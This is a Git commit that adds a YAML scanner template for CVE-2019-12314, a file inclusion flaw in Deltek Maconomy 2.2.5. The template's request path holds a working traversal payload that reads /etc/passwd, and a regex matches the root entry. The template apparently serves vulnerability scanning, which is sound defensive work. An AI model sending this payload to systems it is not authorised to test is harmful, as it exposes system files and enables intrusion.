Create CVE-2019-12314.yaml

patch-1
SaN ThosH 2020-04-08 14:03:39 +05:30 committed by GitHub
parent dbd54bb413
commit 21f9a8685e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 19 additions and 0 deletions

19
cves/CVE-2019-12314.yaml Normal file
View File

@ -0,0 +1,19 @@
id: CVE-2019-12314
info:
name: Deltek Maconomy 2.2.5 LFIl
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd"
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body